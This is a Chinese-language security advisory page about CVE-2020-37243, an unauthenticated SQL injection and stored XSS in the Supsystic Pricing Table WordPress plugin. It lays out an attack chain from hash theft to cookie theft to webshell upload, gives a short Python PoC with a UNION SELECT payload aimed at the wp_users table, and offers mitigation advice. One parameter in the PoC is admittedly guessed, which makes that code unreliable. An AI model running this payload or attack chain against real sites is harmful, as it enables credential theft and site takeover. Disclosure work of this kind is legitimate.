IPBUF安全漏洞报告
English
CVE-2020-37243 CVSS 8.2 高危

CVE-2020-37243 Supsystic插件SQL注入与XSS漏洞

披露日期: 2026-05-16

漏洞信息

漏洞编号
CVE-2020-37243
漏洞类型
SQL注入, 存储型跨站脚本 (Stored XSS)
CVSS评分
8.2 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Supsystic Pricing Table WordPress插件

相关标签

SQL注入存储型XSSWordPress插件SupsysticCVE-2020-37243无需认证

漏洞概述

Supsystic Pricing Table插件1.8.7版本存在高危漏洞。未经认证的攻击者可利用getListForTbl动作中的sidx参数进行SQL注入,执行任意SQL语句窃取数据。同时,插件还存在存储型XSS漏洞,允许在“Edit name”和“Edit HTML”字段注入恶意脚本。当管理员查看定价表时脚本触发,可能导致会话劫持。组合利用这些漏洞可导致服务器被完全控制。

技术细节

漏洞源于插件对用户输入缺乏严格的过滤。首先,在SQL注入方面,getListForTbl接口直接将用户传入的sidx参数拼接到SQL查询语句中,未使用预处理或转义。攻击者可构造包含UNION SELECT的Payload,绕过验证并从数据库中提取敏感信息,如管理员哈希。其次,存储型XSS漏洞发生在数据保存与展示环节。插件未对“Edit name”和“Edit HTML”字段进行充分的HTML实体编码,允许持久化存储恶意JavaScript代码。当具有高权限的用户访问受影响页面时,代码在浏览器端执行,结合SQL注入获取的凭据,攻击者可实现权限提升和服务器接管。

攻击链分析

STEP 1
步骤1:信息收集
攻击者扫描目标WordPress站点,识别是否安装了Supsystic Pricing Table插件及其版本号。
STEP 2
步骤2:SQL注入利用
攻击者向/wp-admin/admin-ajax.php发送特制的GET请求,在action参数设为getListForTbl的同时,向sidx参数注入SQL语句,尝试读取数据库敏感信息。
STEP 3
步骤3:数据窃取
利用SQL注入漏洞获取WordPress管理员账户名和密码哈希,并尝试解密或重置密码。
STEP 4
步骤4:XSS持久化
若无法直接获取权限,攻击者利用存储型XSS,在“Edit HTML”字段注入恶意脚本,等待管理员触发以窃取Session Cookies。
STEP 5
步骤5:接管控制
利用获取的凭证或Session登录后台,上传Webshell或进一步篡改网站内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2020-37243 SQL Injection import requests target_url = "http://example.com/wp-admin/admin-ajax.php" payload = "1 UNION SELECT NULL, user_login, user_pass FROM wp_users-- " params = { "action": "getListForTbl", "sidx": payload, "model": "pricing_table" # Example parameter based on typical WP plugins } response = requests.get(target_url, params=params) if response.status_code == 200: print("[+] Potential SQL Injection vulnerability confirmed!") print("[+] Response:", response.text[:200]) else: print("[-] Request failed or payload blocked.")

影响范围

Supsystic Pricing Table <= 1.8.7

防御指南

临时缓解措施
建议立即检查并更新插件至修复版本。若暂时无法更新,应通过WAF规则封禁包含UNION、SELECT等SQL关键字及<script>标签的请求,或暂时禁用该插件以阻断攻击路径。同时,管理员应排查系统日志,确认是否已被入侵,并强制重置所有管理员密码。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表